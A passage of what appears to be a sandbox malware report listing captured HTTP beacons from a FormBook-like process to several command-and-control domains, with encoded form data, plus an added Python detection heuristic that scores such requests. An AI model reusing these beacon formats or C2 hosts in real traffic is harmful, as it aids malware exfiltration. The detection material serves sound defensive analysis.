                                                                                                      Data Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0a 3c 68 74 6d 6c 20 73 74 79 6c 65 3d 22 68 65 69 67 68 74 3a 31 30 30 25 22 3e 0a 3c 68 65 61 64 3e 0a 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 76 69 65 77 70 6f 72 74 22 20 63 6f 6e 74 65 6e 74 3d 22 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 2c 20 69 6e 69 74 69 61 6c 2d 73 63 61 6c 65 3d 31 2c 20 73 68 72 69 6e 6b 2d 74 6f 2d 66 69 74 3d 6e 6f 22 20 2f 3e 0a 3c 74 69 74 6c 65 3e 20 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 0d 0a 3c 2f 74 69 74 6c 65 3e 3c 73 74 79 6c 65 3e 40 6d 65 64 69 61 20 28 70 72 65 66 65 72 73 2d 63 6f 6c 6f 72 2d 73 63 68 65 6d 65 3a 64 61 72 6b 29 7b 62 6f 64 79 7b 62 61 63 6b 67 72 6f 75 6e 64 2d 63 6f 6c 6f 72 3a 23 30 30 30 21 69 6d 70 6f 72 74 61 6e 74 7d 7d 3c 2f 73 74 79 6c 65 3e 3c 2f 68 65 61 64 3e 0a 3c 62 6f 64 79 20 73 74 79 6c 65 3d 22 63 6f 6c 6f 72 3a 20 23 34 34 34 3b 20 6d 61 72 67 69 6e 3a 30 3b 66 6f 6e 74 3a 20 6e 6f 72 6d 61 6c 20 31 34 70 78 2f 32 30 70 78 20 41 72 69 61 6c 2c 20 48 65 6c 76 65 74 69 [TRUNCATED]
                                                                                                      Data Ascii: <!DOCTYPE html><html style="height:100%"><head><meta name="viewport" content="width=device-width, initial-scale=1, shrink-to-fit=no" /><title> 404 Not Found</title><style>@media (prefers-color-scheme:dark){body{background-color:#000!important}}</style></head><body style="color: #444; margin:0;font: normal 14px/20px Arial, Helvetica, sans-serif; height:100%; background-color: #fff;"><div style="height:auto; min-height:100%; "> <div style="text-align: center; width:800px; margin-left: -400px; position:absolute; top: 30%; left:50%;"> <h1 style="margin:0; font-size:150px; line-height:150px; font-weight:bold;">404</h1><h2 style="margin-top:20px;font-size: 30px;">Not Found</h2><p>The resource requested could not be found on this server!</p></div></div></body></html>
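Every session above comes from the same process (PID 3000) and has the same shape: a fixed macOS Chrome/42 User-Agent, a four-character directory path (/2ho9/, /8o1o/, /4est/), one two-character form field (gP, with -L on the GETs) carrying base64-looking data, and Origin/Referer headers that point back at the beacon path itself, sent to three unrelated domains in turn. The Python below is an added example and is not part of the Joe Sandbox report or of any vendor tooling: it re-parses requests of that shape and scores them, with sample input constructed from the captures on this page plus one benign request. The indicator names, the three-hit threshold, the regexes and the helper that rebuilds requests are assumptions drawn from this capture alone, not a vetted FormBook signature.

```python
"""Heuristic triage of FormBook-style HTTP beacons from captured request text.

Added example, not part of the Joe Sandbox report. Indicator strings, regexes and
the hit threshold are assumptions derived from this one capture.
"""
import re
from collections import defaultdict
from urllib.parse import urlsplit

# User-Agent observed verbatim in every request of this capture.
OBSERVED_UA = ("Mozilla/5.0 (Macintosh; Intel Mac OS X 10_10_4) AppleWebKit/537.36 "
               "(KHTML, like Gecko) Chrome/42.0.2311.152 Safari/537.36")
# Observed paths /2ho9/, /8o1o/, /4est/: four lower-case alphanumerics between slashes.
PATH_RE = re.compile(r"^/[a-z0-9]{4}/$")
# Observed parameter shape: two-character keys (gP, -L) carrying base64-looking values.
KEY_RE = re.compile(r"^[A-Za-z0-9-]{2}$")
B64_RE = re.compile(r"^[A-Za-z0-9+/]{16,}={0,2}$")


def _split_pairs(s: str) -> dict:
    """Split k=v&k=v without decoding '+', which these payloads carry literally."""
    return dict(p.split("=", 1) for p in s.split("&") if "=" in p)


def parse_request(raw: str) -> dict:
    """Split a raw HTTP/1.1 request (CRLF or LF) into method, path, query, headers, body."""
    head, _, body = raw.replace("\r\n", "\n").partition("\n\n")
    lines = head.split("\n")
    method, target, _version = lines[0].split(" ", 2)
    headers = {}
    for line in lines[1:]:
        name, _, value = line.partition(":")
        headers[name.strip().lower()] = value.strip()
    parts = urlsplit(target)
    return {"method": method, "path": parts.path, "query": _split_pairs(parts.query),
            "headers": headers, "body": body.strip()}


def _encoded_params(pairs: dict) -> bool:
    """True when every key is two characters and some value is base64-looking."""
    return (bool(pairs) and all(KEY_RE.match(k) for k in pairs)
            and any(B64_RE.match(v) for v in pairs.values()))


def score_request(req: dict) -> list:
    """Return the indicator names this request matches (empty list = nothing seen)."""
    h, hits = req["headers"], []
    if h.get("user-agent") == OBSERVED_UA:
        hits.append("fixed-ua")
    if PATH_RE.match(req["path"]):
        hits.append("4char-path")
    if (req["method"] == "POST" and h.get("content-type") == "application/x-www-form-urlencoded"
            and _encoded_params(_split_pairs(req["body"]))):
        hits.append("encoded-post-body")
    if req["method"] == "GET" and _encoded_params(req["query"]):
        hits.append("encoded-get-query")
    origin, referer, host = h.get("origin"), h.get("referer"), h.get("host")
    # Origin and Referer name the beacon path itself, as if a form on that page was submitted.
    if origin and referer and host and origin == f"http://{host}" and referer == origin + req["path"]:
        hits.append("self-referer")
    return hits


def triage(raw_requests: list, min_hits: int = 3) -> dict:
    """Score every request; report flagged hosts and whether one shape spans several hosts."""
    per_host = defaultdict(list)
    for raw in raw_requests:
        req = parse_request(raw)
        hits = score_request(req)
        if len(hits) >= min_hits:
            per_host[req["headers"].get("host", "?")].append(hits)
    return {"flagged_hosts": dict(per_host), "distinct_hosts": len(per_host),
            "host_rotation": len(per_host) >= 3}  # three unrelated domains, as in this capture


def extract_redirect(html: str):
    """Return the JavaScript redirect target of a lander-style response, or None."""
    m = re.search(r'window\.location\.href="([^"]+)"', html)
    return m.group(1) if m else None


def _req(method: str, target: str, host: str, body: str = "", ua: str = OBSERVED_UA) -> str:
    """Rebuild a raw request in the shape seen above (constructed sample input, not a capture)."""
    lines = [f"{method} {target} HTTP/1.1", f"Host: {host}", "Accept-Language: en-US",
             "Connection: close", f"User-Agent: {ua}"]
    if body:
        lines += ["Content-Type: application/x-www-form-urlencoded", f"Content-Length: {len(body)}",
                  f"Origin: http://{host}", f"Referer: http://{host}{urlsplit(target).path}"]
    return "\r\n".join(lines) + "\r\n\r\n" + body


GET_QUERY = ("gP=sZDoihg8ajsFNu4sFB4wVMG24nWUkQUSxybOs53co7FoCsqulhCNIl7qmx9+CpDfKiL3BRrx3kpFS5y+"
             "tLS3H5WrA65sHfIkn+XzJEmDgF1B4fp1cD4x67M=&-L=kBMxZFRpAD6P")
# Constructed sample set: bodies copied from the captures above, plus one benign request.
SAMPLE_REQUESTS = [
    _req("POST", "/2ho9/", "www.consultarfacil.online",
         "gP=hbrIhRUnKXpFHdcPK0IbX+COuW77gw0a3yinnLbJrawpBPShkT6ZUwL2kj0kBJ+mO3mJbjLP4w1mbKG/zqjIDKaKB6xFK/gagvm8J02GwUw6hqlscFw/+ab0QrG9mXiLQdUi1iiDzZDrEYCAt3JSn+M7pochmm2j5/8osiyItr8K9P6BXtmMNTAQ8L5RU11BlhY3//rxXDmOWSc5uwg5ZNI="),
    _req("GET", "/2ho9/?" + GET_QUERY, "www.consultarfacil.online"),
    _req("POST", "/8o1o/", "www.broomeorchard.xyz",
         "gP=dsPBWRzHGXhtDiSPgCvCpk5PAUWlZXNT8xCaKx3v7lDEwReAhx6+AYKk7XvztB2hFIuUf4Io6PmaDpZIlIq4UI0Q/F04qO1Y2OLiqrcVayD3Mkb3hKE6MGQhTETpoLUo9e9IoJIFqSEkfVLH9POvrqkINN8OsDKFxXanBFYhH53ZW3JK5pfIdbpAPi7XyoHCJA=="),
    _req("POST", "/4est/", "www.suarahati20.xyz",
         "gP=3RKIN8ruKXiYReD8Y1DX3cANHjQwvDsXXwOHKhPdB6TaQkKdpgac2erzDGCSJYTJYNN1lK1cElFSD2xoTOJTlqs3E139u5dp5eloYAXkv3nc4ouKEtR6V+Kar621/FNkMEy0XiTqyNjdG1jdpeK9rolsGK2bg7eYjtyudMKZ4S6B8UtKXiOe2o0cSUQO7PRTzw=="),
    _req("GET", "/search?q=test", "www.example.com", ua="curl/8.0"),
]
# Server answer copied from the capture above (session 32).
SAMPLE_RESPONSE = ('<!DOCTYPE html><html><head><script>window.onload=function(){'
                   'window.location.href="/lander?' + GET_QUERY + '"}</script></head></html>')

if __name__ == "__main__":
    for raw in SAMPLE_REQUESTS:
        r = parse_request(raw)
        print(r["method"], r["headers"]["host"], r["path"], score_request(r))
    print(triage(SAMPLE_REQUESTS))
    print("redirect ->", extract_redirect(SAMPLE_RESPONSE))
```

The per-request hits are deliberately weak on their own (a four-character path or a base64 form field is common on legitimate sites); what makes the capture distinctive is the combination plus the same process sending the identical shape to three unrelated domains in under half a minute, which is why triage() reports host rotation separately. Note also that the server's 200 response only echoes the request parameters back in a JavaScript redirect, so a non-error status is not evidence that the C2 accepted anything.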


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
38 | 192.168.2.11 | 50019 | 198.252.106.191 | 80 | 3000 | C:\Program Files (x86)\PZHeSQlLTMgDWGgAeGkqhKIlzUAaLXeGcDNeBEjXxOvHEQaaccEFsXfl\UCAmCgWJyh.exe
Timestamp | Bytes transferred | Direction | Data
Oct 8, 2024 15:57:25.764981031 CEST | 753 | OUT | POST /4est/ HTTP/1.1
                                                                                                      Host: www.suarahati20.xyz
                                                                                                      Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8
                                                                                                      Accept-Language: en-US
                                                                                                      Accept-Encoding: gzip, deflate, br
                                                                                                      Content-Type: application/x-www-form-urlencoded
                                                                                                      Cache-Control: no-cache
                                                                                                      Connection: close
                                                                                                      Content-Length: 219
                                                                                                      Origin: http://www.suarahati20.xyz
                                                                                                      Referer: http://www.suarahati20.xyz/4est/
                                                                                                      User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_10_4) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/42.0.2311.152 Safari/537.36
                                                                                                      Data Raw: 67 50 3d 33 52 4b 49 4e 38 72 75 4b 58 69 59 51 2b 54 38 61 57 37 58 31 38 41 4d 62 7a 51 77 6d 6a 73 4c 58 77 43 48 4b 67 62 4e 42 49 6e 61 51 46 36 64 6f 68 61 63 7a 65 72 7a 62 57 43 58 52 34 54 65 59 4e 78 39 6c 4c 6c 63 45 6c 52 53 44 33 74 6f 54 39 68 51 6c 36 73 31 4d 56 33 37 78 4a 64 70 35 65 6c 6f 59 41 44 4f 76 33 76 63 34 59 65 4b 46 4d 52 39 4a 4f 4b 5a 37 71 32 31 37 46 4e 67 4d 45 79 61 58 6d 4c 51 79 4f 62 64 47 77 50 64 6f 50 4c 72 68 6f 6c 71 4a 71 33 36 72 4f 7a 4a 6e 66 2f 35 54 71 53 7a 7a 69 32 6d 30 79 38 51 48 42 48 4a 31 37 38 65 47 79 78 2b 79 2b 30 61 6f 35 6b 66 7a 5a 62 51 33 52 6b 35 64 66 61 46 51 7a 55 6a 48 77 6b 3d
                                                                                                      Data Ascii: gP=3RKIN8ruKXiYQ+T8aW7X18AMbzQwmjsLXwCHKgbNBInaQF6dohaczerzbWCXR4TeYNx9lLlcElRSD3toT9hQl6s1MV37xJdp5eloYADOv3vc4YeKFMR9JOKZ7q217FNgMEyaXmLQyObdGwPdoPLrholqJq36rOzJnf/5TqSzzi2m0y8QHBHJ178eGyx+y+0ao5kfzZbQ3Rk5dfaFQzUjHwk=
Oct 8, 2024 15:57:26.354571104 CEST | 1033 | IN | HTTP/1.1 404 Not Found
                                                                                                      Connection: close
                                                                                                      cache-control: private, no-cache, no-store, must-revalidate, max-age=0
                                                                                                      pragma: no-cache
                                                                                                      content-type: text/html
                                                                                                      content-length: 796
                                                                                                      date: Tue, 08 Oct 2024 13:57:26 GMT
                                                                                                      server: LiteSpeed
                                                                                                      Data Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0a 3c 68 74 6d 6c 20 73 74 79 6c 65 3d 22 68 65 69 67 68 74 3a 31 30 30 25 22 3e 0a 3c 68 65 61 64 3e 0a 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 76 69 65 77 70 6f 72 74 22 20 63 6f 6e 74 65 6e 74 3d 22 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 2c 20 69 6e 69 74 69 61 6c 2d 73 63 61 6c 65 3d 31 2c 20 73 68 72 69 6e 6b 2d 74 6f 2d 66 69 74 3d 6e 6f 22 20 2f 3e 0a 3c 74 69 74 6c 65 3e 20 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 0d 0a 3c 2f 74 69 74 6c 65 3e 3c 73 74 79 6c 65 3e 40 6d 65 64 69 61 20 28 70 72 65 66 65 72 73 2d 63 6f 6c 6f 72 2d 73 63 68 65 6d 65 3a 64 61 72 6b 29 7b 62 6f 64 79 7b 62 61 63 6b 67 72 6f 75 6e 64 2d 63 6f 6c 6f 72 3a 23 30 30 30 21 69 6d 70 6f 72 74 61 6e 74 7d 7d 3c 2f 73 74 79 6c 65 3e 3c 2f 68 65 61 64 3e 0a 3c 62 6f 64 79 20 73 74 79 6c 65 3d 22 63 6f 6c 6f 72 3a 20 23 34 34 34 3b 20 6d 61 72 67 69 6e 3a 30 3b 66 6f 6e 74 3a 20 6e 6f 72 6d 61 6c 20 31 34 70 78 2f 32 30 70 78 20 41 72 69 61 6c 2c 20 48 65 6c 76 65 74 69 [TRUNCATED]
                                                                                                      Data Ascii: <!DOCTYPE html><html style="height:100%"><head><meta name="viewport" content="width=device-width, initial-scale=1, shrink-to-fit=no" /><title> 404 Not Found</title><style>@media (prefers-color-scheme:dark){body{background-color:#000!important}}</style></head><body style="color: #444; margin:0;font: normal 14px/20px Arial, Helvetica, sans-serif; height:100%; background-color: #fff;"><div style="height:auto; min-height:100%; "> <div style="text-align: center; width:800px; margin-left: -400px; position:absolute; top: 30%; left:50%;"> <h1 style="margin:0; font-size:150px; line-height:150px; font-weight:bold;">404</h1><h2 style="margin-top:20px;font-size: 30px;">Not Found</h2><p>The resource requested could not be found on this server!</p></div></div></body></html>


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
39 | 192.168.2.11 | 50020 | 198.252.106.191 | 80 | 3000 | C:\Program Files (x86)\PZHeSQlLTMgDWGgAeGkqhKIlzUAaLXeGcDNeBEjXxOvHEQaaccEFsXfl\UCAmCgWJyh.exe
Timestamp | Bytes transferred | Direction | Data
Oct 8, 2024 15:57:28.322824001 CEST | 1766 | OUT | POST /4est/ HTTP/1.1
                                                                                                      Host: www.suarahati20.xyz
                                                                                                      Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8
                                                                                                      Accept-Language: en-US
                                                                                                      Accept-Encoding: gzip, deflate, br
                                                                                                      Content-Type: application/x-www-form-urlencoded
                                                                                                      Cache-Control: no-cache
                                                                                                      Connection: close
                                                                                                      Content-Length: 1231
                                                                                                      Origin: http://www.suarahati20.xyz
                                                                                                      Referer: http://www.suarahati20.xyz/4est/
                                                                                                      User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_10_4) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/42.0.2311.152 Safari/537.36
                                                                                                      Data Raw: 67 50 3d 33 52 4b 49 4e 38 72 75 4b 58 69 59 51 2b 54 38 61 57 37 58 31 38 41 4d 62 7a 51 77 6d 6a 73 4c 58 77 43 48 4b 67 62 4e 42 49 66 61 54 33 79 64 70 43 79 63 30 65 72 7a 53 32 43 57 52 34 54 66 59 4e 70 35 6c 4f 38 70 45 6e 70 53 44 56 4a 6f 56 4d 68 51 38 4b 73 31 4f 56 33 2b 75 35 64 38 35 65 31 6b 59 41 54 4f 76 33 76 63 34 61 32 4b 4d 39 52 39 61 65 4b 61 72 36 32 35 2f 46 4e 59 4d 46 61 73 58 6d 66 36 78 2b 37 64 47 55 76 64 76 39 6a 72 70 6f 6c 6f 64 4b 33 59 72 4f 32 52 6e 66 6a 31 54 71 4f 56 7a 68 57 6d 33 58 46 4f 57 42 33 33 32 36 34 59 53 78 35 44 78 65 73 46 6c 59 30 46 6c 4e 71 68 72 42 6c 73 66 50 37 51 42 44 4e 6e 61 77 6e 6a 57 77 4b 4c 71 7a 61 79 45 70 35 52 63 6c 42 41 47 74 4a 41 44 2b 75 4f 72 77 50 72 68 6e 51 53 63 51 53 74 75 75 37 32 4b 78 59 55 67 67 4f 4a 35 6b 64 32 58 77 31 6d 38 49 69 70 37 43 77 72 67 4d 37 7a 4a 49 68 7a 69 63 61 36 53 35 55 6d 67 52 41 66 4c 61 70 6a 72 6a 4d 45 62 53 5a 64 7a 50 72 45 54 48 4e 39 42 4b 61 53 69 32 56 50 42 4f 4e 54 4a 69 78 [TRUNCATED]
Data Ascii: gP=[TRUNCATED]
Oct 8, 2024 15:57:28.948509932 CEST | 1033 | IN | HTTP/1.1 404 Not Found
                                                                                                      Connection: close
                                                                                                      cache-control: private, no-cache, no-store, must-revalidate, max-age=0
                                                                                                      pragma: no-cache
                                                                                                      content-type: text/html
                                                                                                      content-length: 796
                                                                                                      date: Tue, 08 Oct 2024 13:57:28 GMT
                                                                                                      server: LiteSpeed
                                                                                                      Data Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0a 3c 68 74 6d 6c 20 73 74 79 6c 65 3d 22 68 65 69 67 68 74 3a 31 30 30 25 22 3e 0a 3c 68 65 61 64 3e 0a 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 76 69 65 77 70 6f 72 74 22 20 63 6f 6e 74 65 6e 74 3d 22 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 2c 20 69 6e 69 74 69 61 6c 2d 73 63 61 6c 65 3d 31 2c 20 73 68 72 69 6e 6b 2d 74 6f 2d 66 69 74 3d 6e 6f 22 20 2f 3e 0a 3c 74 69 74 6c 65 3e 20 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 0d 0a 3c 2f 74 69 74 6c 65 3e 3c 73 74 79 6c 65 3e 40 6d 65 64 69 61 20 28 70 72 65 66 65 72 73 2d 63 6f 6c 6f 72 2d 73 63 68 65 6d 65 3a 64 61 72 6b 29 7b 62 6f 64 79 7b 62 61 63 6b 67 72 6f 75 6e 64 2d 63 6f 6c 6f 72 3a 23 30 30 30 21 69 6d 70 6f 72 74 61 6e 74 7d 7d 3c 2f 73 74 79 6c 65 3e 3c 2f 68 65 61 64 3e 0a 3c 62 6f 64 79 20 73 74 79 6c 65 3d 22 63 6f 6c 6f 72 3a 20 23 34 34 34 3b 20 6d 61 72 67 69 6e 3a 30 3b 66 6f 6e 74 3a 20 6e 6f 72 6d 61 6c 20 31 34 70 78 2f 32 30 70 78 20 41 72 69 61 6c 2c 20 48 65 6c 76 65 74 69 [TRUNCATED]
                                                                                                      Data Ascii: <!DOCTYPE html><html style="height:100%"><head><meta name="viewport" content="width=device-width, initial-scale=1, shrink-to-fit=no" /><title> 404 Not Found</title><style>@media (prefers-color-scheme:dark){body{background-color:#000!important}}</style></head><body style="color: #444; margin:0;font: normal 14px/20px Arial, Helvetica, sans-serif; height:100%; background-color: #fff;"><div style="height:auto; min-height:100%; "> <div style="text-align: center; width:800px; margin-left: -400px; position:absolute; top: 30%; left:50%;"> <h1 style="margin:0; font-size:150px; line-height:150px; font-weight:bold;">404</h1><h2 style="margin-top:20px;font-size: 30px;">Not Found</h2><p>The resource requested could not be found on this server!</p></div></div></body></html>


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
40 | 192.168.2.11 | 50021 | 198.252.106.191 | 80 | 3000 | C:\Program Files (x86)\PZHeSQlLTMgDWGgAeGkqhKIlzUAaLXeGcDNeBEjXxOvHEQaaccEFsXfl\UCAmCgWJyh.exe
Timestamp | Bytes transferred | Direction | Data
Oct 8, 2024 15:57:30.863439083 CEST | 463 | OUT | GET /4est/?gP=6TioOITzTznuWaHCUWnl//RNTiJIkSIqdx+6cQbbG9CbTHyFxDml283eSUfpT4rPWLRehJ5KDSFFDUFbTukXlY89F3XW39p23v05UDH3lWqOp67DGsRlWdM=&-L=kBMxZFRpAD6P HTTP/1.1
                                                                                                      Host: www.suarahati20.xyz
                                                                                                      Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8
                                                                                                      Accept-Language: en-US
                                                                                                      Connection: close
                                                                                                      User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_10_4) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/42.0.2311.152 Safari/537.36
Oct 8, 2024 15:57:31.436985970 CEST | 1033 | IN | HTTP/1.1 404 Not Found
                                                                                                      Connection: close
                                                                                                      cache-control: private, no-cache, no-store, must-revalidate, max-age=0
                                                                                                      pragma: no-cache
                                                                                                      content-type: text/html
                                                                                                      content-length: 796
                                                                                                      date: Tue, 08 Oct 2024 13:57:31 GMT
                                                                                                      server: LiteSpeed
                                                                                                      Data Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0a 3c 68 74 6d 6c 20 73 74 79 6c 65 3d 22 68 65 69 67 68 74 3a 31 30 30 25 22 3e 0a 3c 68 65 61 64 3e 0a 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 76 69 65 77 70 6f 72 74 22 20 63 6f 6e 74 65 6e 74 3d 22 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 2c 20 69 6e 69 74 69 61 6c 2d 73 63 61 6c 65 3d 31 2c 20 73 68 72 69 6e 6b 2d 74 6f 2d 66 69 74 3d 6e 6f 22 20 2f 3e 0a 3c 74 69 74 6c 65 3e 20 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 0d 0a 3c 2f 74 69 74 6c 65 3e 3c 73 74 79 6c 65 3e 40 6d 65 64 69 61 20 28 70 72 65 66 65 72 73 2d 63 6f 6c 6f 72 2d 73 63 68 65 6d 65 3a 64 61 72 6b 29 7b 62 6f 64 79 7b 62 61 63 6b 67 72 6f 75 6e 64 2d 63 6f 6c 6f 72 3a 23 30 30 30 21 69 6d 70 6f 72 74 61 6e 74 7d 7d 3c 2f 73 74 79 6c 65 3e 3c 2f 68 65 61 64 3e 0a 3c 62 6f 64 79 20 73 74 79 6c 65 3d 22 63 6f 6c 6f 72 3a 20 23 34 34 34 3b 20 6d 61 72 67 69 6e 3a 30 3b 66 6f 6e 74 3a 20 6e 6f 72 6d 61 6c 20 31 34 70 78 2f 32 30 70 78 20 41 72 69 61 6c 2c 20 48 65 6c 76 65 74 69 [TRUNCATED]
                                                                                                      Data Ascii: <!DOCTYPE html><html style="height:100%"><head><meta name="viewport" content="width=device-width, initial-scale=1, shrink-to-fit=no" /><title> 404 Not Found</title><style>@media (prefers-color-scheme:dark){body{background-color:#000!important}}</style></head><body style="color: #444; margin:0;font: normal 14px/20px Arial, Helvetica, sans-serif; height:100%; background-color: #fff;"><div style="height:auto; min-height:100%; "> <div style="text-align: center; width:800px; margin-left: -400px; position:absolute; top: 30%; left:50%;"> <h1 style="margin:0; font-size:150px; line-height:150px; font-weight:bold;">404</h1><h2 style="margin-top:20px;font-size: 30px;">Not Found</h2><p>The resource requested could not be found on this server!</p></div></div></body></html>


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
41 | 192.168.2.11 | 50022 | 43.154.104.247 | 80 | 3000 | C:\Program Files (x86)\PZHeSQlLTMgDWGgAeGkqhKIlzUAaLXeGcDNeBEjXxOvHEQaaccEFsXfl\UCAmCgWJyh.exe
Timestamp | Bytes transferred | Direction | Data
Oct 8, 2024 15:57:37.161554098 CEST | 715 | OUT | POST /8qne/ HTTP/1.1
                                                                                                      Host: www.nmh6.site
                                                                                                      Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8
                                                                                                      Accept-Language: en-US
                                                                                                      Accept-Encoding: gzip, deflate, br
                                                                                                      Content-Type: application/x-www-form-urlencoded
                                                                                                      Cache-Control: no-cache
                                                                                                      Connection: close
                                                                                                      Content-Length: 199
                                                                                                      Origin: http://www.nmh6.site
                                                                                                      Referer: http://www.nmh6.site/8qne/
                                                                                                      User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_10_4) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/42.0.2311.152 Safari/537.36
                                                                                                      Data Raw: 67 50 3d 48 52 72 72 44 58 52 6e 74 4a 6f 4e 33 31 67 4d 68 34 63 45 76 2b 6b 43 30 4e 69 70 51 48 4b 76 5a 4f 4e 42 6d 43 54 42 57 45 6f 68 6c 35 4f 42 71 58 6d 52 2b 65 50 34 59 42 2f 78 35 35 51 45 71 5a 74 37 4f 54 44 49 41 6f 42 4e 4e 33 78 7a 33 45 73 39 6f 42 72 7a 6e 64 67 4a 65 78 58 7a 46 5a 59 58 78 41 74 37 65 55 4c 36 6d 66 4a 5a 41 35 76 63 53 55 52 4c 53 73 5a 47 41 35 4a 75 70 4d 6b 30 7a 4e 33 75 70 4f 72 71 39 53 4a 58 73 53 43 74 34 68 75 37 33 2f 58 36 45 47 70 47 50 30 33 2f 5a 6e 41 6f 6a 75 61 36 70 48 6a 5a 71 6f 37 6f 62 74 37 6c 55 69 6f 51 37 4a 64 50 75 67 3d 3d
                                                                                                      Data Ascii: gP=HRrrDXRntJoN31gMh4cEv+kC0NipQHKvZONBmCTBWEohl5OBqXmR+eP4YB/x55QEqZt7OTDIAoBNN3xz3Es9oBrzndgJexXzFZYXxAt7eUL6mfJZA5vcSURLSsZGA5JupMk0zN3upOrq9SJXsSCt4hu73/X6EGpGP03/ZnAojua6pHjZqo7obt7lUioQ7JdPug==


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
42 | 192.168.2.11 | 50023 | 43.154.104.247 | 80 | 3000 | C:\Program Files (x86)\PZHeSQlLTMgDWGgAeGkqhKIlzUAaLXeGcDNeBEjXxOvHEQaaccEFsXfl\UCAmCgWJyh.exe
Timestamp | Bytes transferred | Direction | Data
Oct 8, 2024 15:57:39.714010954 CEST | 735 | OUT | POST /8qne/ HTTP/1.1
                                                                                                      Host: www.nmh6.site
                                                                                                      Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8
                                                                                                      Accept-Language: en-US
                                                                                                      Accept-Encoding: gzip, deflate, br
                                                                                                      Content-Type: application/x-www-form-urlencoded
                                                                                                      Cache-Control: no-cache
                                                                                                      Connection: close
                                                                                                      Content-Length: 219
                                                                                                      Origin: http://www.nmh6.site
                                                                                                      Referer: http://www.nmh6.site/8qne/
                                                                                                      User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_10_4) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/42.0.2311.152 Safari/537.36
                                                                                                      Data Raw: 67 50 3d 48 52 72 72 44 58 52 6e 74 4a 6f 4e 33 56 51 4d 6b 5a 63 45 71 65 6b 4e 78 4e 69 70 43 48 4b 72 5a 4f 42 42 6d 44 6e 72 57 57 63 68 6d 62 6d 42 72 57 6d 52 2f 65 50 34 54 68 2f 30 33 5a 51 66 71 5a 70 7a 4f 54 50 49 41 6f 56 4e 4e 31 70 7a 32 33 30 36 72 78 72 31 76 39 67 50 42 68 58 7a 46 5a 59 58 78 42 49 67 65 56 6a 36 6d 4c 31 5a 53 59 76 66 66 30 52 4d 52 73 5a 47 52 4a 4a 71 70 4d 6b 47 7a 4d 72 58 70 4d 6a 71 39 58 74 58 73 44 43 71 78 68 75 69 71 76 57 61 4e 55 67 57 4b 32 4f 54 59 33 59 62 71 4d 32 4d 68 68 79 44 36 4c 79 2f 59 2b 7a 6e 41 45 4a 67 79 34 34 47 31 6e 33 75 77 38 7a 63 38 58 44 62 67 63 7a 39 42 34 54 78 39 36 59 3d
                                                                                                      Data Ascii: gP=HRrrDXRntJoN3VQMkZcEqekNxNipCHKrZOBBmDnrWWchmbmBrWmR/eP4Th/03ZQfqZpzOTPIAoVNN1pz2306rxr1v9gPBhXzFZYXxBIgeVj6mL1ZSYvff0RMRsZGRJJqpMkGzMrXpMjq9XtXsDCqxhuiqvWaNUgWK2OTY3YbqM2MhhyD6Ly/Y+znAEJgy44G1n3uw8zc8XDbgcz9B4Tx96Y=


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
43 | 192.168.2.11 | 50024 | 43.154.104.247 | 80 | 3000 | C:\Program Files (x86)\PZHeSQlLTMgDWGgAeGkqhKIlzUAaLXeGcDNeBEjXxOvHEQaaccEFsXfl\UCAmCgWJyh.exe
Timestamp | Bytes transferred | Direction | Data
Oct 8, 2024 15:57:42.435674906 CEST | 1748 | OUT | POST /8qne/ HTTP/1.1
                                                                                                      Host: www.nmh6.site
                                                                                                      Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8
                                                                                                      Accept-Language: en-US
                                                                                                      Accept-Encoding: gzip, deflate, br
                                                                                                      Content-Type: application/x-www-form-urlencoded
                                                                                                      Cache-Control: no-cache
                                                                                                      Connection: close
                                                                                                      Content-Length: 1231
                                                                                                      Origin: http://www.nmh6.site
                                                                                                      Referer: http://www.nmh6.site/8qne/
                                                                                                      User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_10_4) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/42.0.2311.152 Safari/537.36
